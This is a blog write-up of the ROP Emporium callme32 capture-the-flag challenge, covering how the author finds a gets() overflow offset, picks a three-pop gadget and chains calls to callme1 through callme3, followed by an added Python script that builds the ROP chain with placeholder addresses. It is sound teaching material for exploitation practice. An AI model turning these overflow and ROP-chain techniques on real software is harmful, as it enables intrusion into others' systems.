ROP Emporium Callme32 (32 Bit) Writeup
This is the 3rd challenge in ROP Emporium and it does get a bit tricky from here. I had to call 3 functions and each function has 3 arguments “0xdeadbeef”, “0xcafebabe”, “0xd00df00d”. So let's get started with the challenge.
First I start the challenge by checking the type of file the given binary is.
Next, I check the memory protection in the binary by using “checksec”
Now I had to check the functions present in the binary. I used rabin2 to get the details.
rabin2 -i "binary_name"
I noticed last time that rabin2 and gdb don’t give all the functions in the binary. So I used this tool called objdump. This gave every function present in the binary. Once again usefulFunction() wasn't displayed in rabin2 and gdb :(
As per the hint given on the website, the functions to be called are “callme1()”, “callme2()”, “callme3()”. On further analysis of the binary, I found that the main function calls pwnme(). pwnme() has a gets() call, which I use to exploit this challenge.
I had to find the offset value to overwrite the buffer, padding, and ebp. To do this, I used “pattern create” in gdb-peda. Then I used this pattern as input after running the binary inside gdb-peda.
Here, we can see that “AFAA” has been overwritten into EIP. To check the offset value, we use “pattern offset”.
So I need to give 44 random characters to overwrite the buffer, padding, and EBP. Now I had to find the address of the “callme1()”, “callme2()”, “callme3()” functions. I directly used the ones we got in rabin2 back in picture 3.
This is where things take a turn. How do we send 3 arguments in EIP? A quick search on Google gave me the answer. We use registers to pop the values.
But how do we insert the values in them? And that's where ROPgadget comes in handy. We need to find gadgets having 3 pops and a return.
So the last one can be used for our purpose. Now I tried developing the logic. First I need to overwrite the buffer, padding, and ebp to reach eip. Then I call the callme1() function. After that, I call the gadget with 3 pops and finally the 3 arguments “0xdeadbeef”, “0xcafebabe”, “0xd00df00d”. These will be taken as arguments to the first function. I repeat this for the other 2 functions as well. So here is my exploit. Refer to my previous blogs on how to draw the stack diagram for this.
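As an added example (not the author's script), here is a Python builder for the chain just described, plus a helper that decodes the payload back into the stack diagram so each slot can be checked before sending. The callme function addresses and the pop-pop-pop-ret gadget address are placeholders: the real values come from rabin2/objdump and ROPgadget on the binary and are not reproduced on this page.

```python
import struct

# Argument values given in the challenge description.
ARGS = (0xdeadbeef, 0xcafebabe, 0xd00df00d)
# Bytes of buffer + padding + saved EBP before the saved EIP (found with pattern offset).
OFFSET = 44

# PLACEHOLDER addresses: substitute the ones rabin2/objdump and ROPgadget report
# for the actual binary. They are not the real callme32 addresses.
CALLME = {"callme1": 0x0804a001, "callme2": 0x0804a002, "callme3": 0x0804a003}
POP3_RET = 0x0804a004  # a gadget of the form pop <reg>; pop <reg>; pop <reg>; ret

def p32(value):
    """Pack a 32-bit little-endian word, as it sits on the x86 stack."""
    return struct.pack("<I", value)

def build_chain(callme, pop3_ret, args=ARGS, offset=OFFSET):
    """Overwrite up to EIP, then for each callmeN: [callmeN][pop3;ret][arg1][arg2][arg3].

    When callmeN runs, the pop3;ret slot is its return address and the three
    words after it are arg1..arg3 (cdecl). On return, the gadget pops those
    three words off the stack and its ret lands on the next callmeN address.
    """
    payload = b"A" * offset
    for name in ("callme1", "callme2", "callme3"):
        payload += p32(callme[name]) + p32(pop3_ret)
        payload += b"".join(p32(a) for a in args)
    return payload

def stack_diagram(payload, offset=OFFSET):
    """Decode the payload into (label, value) rows in stack order for inspection."""
    labels = ["return addr (callmeN)", "pop3;ret gadget", "arg1", "arg2", "arg3"]
    rows = [("padding", offset)]
    for i in range(offset, len(payload), 4):
        word = struct.unpack("<I", payload[i:i + 4])[0]
        rows.append((labels[((i - offset) // 4) % len(labels)], word))
    return rows

if __name__ == "__main__":
    chain = build_chain(CALLME, POP3_RET)
    for label, value in stack_diagram(chain):
        print(f"{label:24s} {value:#010x}")
```

Writing the chain to a file and feeding it to the binary's stdin is all that remains; the diagram printed above should match the one drawn by hand.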
Executing this should give my flag.
WE HAVE OUR FLAG!
Hope you understood the challenge. Do check out my other blogs.
Don’t forget to give some claps if you reached here :) Follow me for more writeups.
Goodbye:)